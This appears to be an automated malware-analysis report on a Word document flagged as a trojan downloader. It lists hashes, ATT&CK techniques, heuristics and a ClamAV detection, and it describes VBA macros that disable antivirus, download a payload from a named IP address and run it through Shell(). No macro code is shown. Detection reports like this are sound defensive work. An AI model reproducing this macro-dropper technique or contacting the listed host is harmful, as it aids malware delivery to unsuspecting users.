Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 621022fd31dbd12e…

MALICIOUS

Office (OLE) / .DOC

61.0 KB Created: 2008-06-20 14:05:00 Authoring application: Microsoft Word 11.3.8
MD5: 086ab9c07130fbe473e5c89a5dcfb710 SHA-1: 0cb9e13ff9a5084d7497439c8e3fc3dc07a72c46 SHA-256: 621022fd31dbd12ef3b184b897e1ff4b10b19861c819dcd0e8201829d707120f
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is a Word document containing VBA macros. The macros disable virus protection and use the Shell() function to execute commands. Specifically, the script attempts to download a payload from the IP address 209.201.88.110 to a file named c:\hsf*.sys and then execute it via c:\netldx.vxd. This indicates a downloader or droppper functionality.

Heuristics 4

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.apple.com/DTDs/PropertyList-1.0.dtd

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
ebc96ba8a771068cd59d6fdf9daaf0e218ed6ff72523ce26809784637bc3f3e9		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 6324 bytes
Detection
ClamAV: Doc.Trojan.Marker-3
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.